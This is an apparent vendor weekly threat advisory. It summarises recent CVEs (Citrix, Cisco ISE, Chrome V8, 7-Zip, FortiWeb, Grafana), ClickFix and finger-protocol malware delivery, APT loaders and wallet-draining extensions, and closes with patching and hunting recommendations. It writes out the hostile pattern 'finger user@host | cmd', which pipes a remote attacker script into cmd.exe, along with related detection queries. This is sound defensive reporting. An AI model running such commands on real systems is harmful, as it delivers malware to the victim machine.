Breach Barometer: From V8 Exploits to Wallet Drains

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Identity Gateways Under Fire

Advanced actors are zero-daying identity and access edge gear to walk past authentication and plant stealthy implants, turning gateways into persistence beacons.

• Citrix NetScaler & Cisco ISE zero-days chained — Pre-auth bypass (Citrix “Bleed 2”, CVE-2025-5777) plus Cisco ISE RCE (CVE-2025-20337) used to drop a fileless Tomcat-thread web shell (“IdentityAuditAction”) with DES-obfuscated C2 and listener persistence.

2. ClickFix & Retro-Protocol Social Engineering

Old Windows tricks and legacy protocols are back—now weaponized as copy-paste payload rails.

• Finger protocol abuse — “finger user@host | cmd” pipes attacker scripts straight into cmd.exe to fetch Python malware or NetSupport RAT; campaigns hide behind fake CAPTCHA “verification” prompts.
• Amatera Stealer via ClickFix — Run-dialog lures launch mshta → PowerShell → MSBuild to inject a PureCrypter-packed .NET DLL; Amatera harvests creds/wallets and conditionally drops NetSupport RAT.

3. APT Tradecraft: DNS/AitM & Long-Haul Loaders

State-aligned groups are shifting from simple phish to infrastructure-level hijack and multi-year, low-noise loaders.

• PlushDaemon EdgeStepper — Go backdoor on edge devices hijacks DNS to reroute software updates, delivering LittleDaemon → DaemonicLogistics → SlowStepper for espionage across semiconductor, manufacturing, and academia.
• APT24 “BadAudio” — Heavily-obfuscated DLL loader delivered via watering holes, a Taiwanese JS supply-chain breach, and themed spearphish; AES-encrypted beacons and in-memory payloads (incl. Cobalt Strike) with persistently low AV detection.

4. Browser & Archive Exploits

High-frequency V8 bugs and unsafe ZIP/symlink parsing keep drive-by compromise viable at scale.

• Chrome V8 zero-day (CVE-2025-13223) — Actively exploited type-confusion enabling heap corruption and potential RCE; companion V8 bug (CVE-2025-13224) found by Google’s “Big Sleep” AI.
• 7-Zip symlink RCE (CVE-2025-11001/11002) — Symbolic-link traversal lets attacker ZIPs write outside extract paths; public PoC and reports of in-the-wild abuse on Windows, risky when 7-Zip runs elevated or in pipelines.

5. Perimeter & Identity Appliances: Patch-Now Queue

Edge and observability platforms present crisp privilege and availability wins for attackers this week.

• FortiWeb OS command injection (CVE-2025-58034) — Auth-required but actively exploited; crafted requests/CLI lead to arbitrary OS command execution; fixes across multiple FortiWeb trains.
• SonicOS SSLVPN DoS (CVE-2025-40601) — Remote, unauth crash of Gen7/Gen8 firewalls; plus email gateway RCE/info-leak bugs — urgent updates advised.
• Grafana Enterprise SCIM impersonation (CVE-2025-41115) — SCIM externalId → user.uid collision allows instant admin takeover when SCIM is enabled; patched in 12.3.0/12.2.1/12.1.3/12.0.6.

6. Web3 Drains & Wallet Spoofs

Threat actors are bypassing classic C2 by laundering exfil over blockchains and weaponizing “wallet UX”.

• Safery Chrome wallet — Fake ETH wallet extension steals seed phrases and encodes them into micro-transactions on Sui; attacker later decodes on-chain data and empties victim wallets.

7. Ransomware, Mobile, and Fraud Pulse

Crimeware is leaning into outcome-driven operations: faster exfil, cross-platform reach, and extortion without encryption.

• RaaS and stealers — White Lock, Beast, Qilin (quadruple extortion) surge; Stealerium returns with flexible exfil.
• Mobile kits — BTMOB and SparkKitty span Android/iOS with overlays, OCR for wallet keys, and app-store infiltration.
• Payments fraud evolution — Executive-workflow impersonation, embedded-wallet abuse, synthetic IDs/deepfakes, and transaction-mutation exploits shorten detection windows.

8. Internet Fabric Fragility

Platform-level outages remain a business-continuity risk even when your stack is healthy.

• Cloudflare global incident — HTTP 500s, dashboard/API impact across multiple regions; partial recovery noted—revisit multi-CDN and DNS failover runbooks.

Proactive Steps for the Week

• Patch & restart: Chrome (all Chromium variants), 7-Zip ≥25.00, FortiWeb to fixed trains, SonicOS/Email Security, Grafana Enterprise (or disable SCIM).
• Ring-fence edge gear: Remove internet exposure for management planes; enforce MFA, jump hosts, and IP allowlists on Citrix, Cisco ISE, FortiWeb, SonicWall.
• Hunt & contain: Query for finger * | cmd, mshta → powershell → msbuild, unexpected Tomcat listeners/classes on Cisco ISE, DNS changes on edge devices, and extensions making blockchain RPCs.
• Dev pipeline hygiene: Block/alert on JSON Keeper/JSONsilo/npoint pulls from build/dev nets; SRI/CSP for third-party JS; mandatory review of external “assessment/demo” repos.
• Web3/user hardening: Remove unvetted wallet extensions; baseline allowed chains/RPC endpoints; monitor for on-chain micro-txns triggered during wallet import.
• BC/DR drill: Re-run failover tests for CDN/DNS providers; pre-approve direct-to-origin playbooks for Cloudflare-style outages.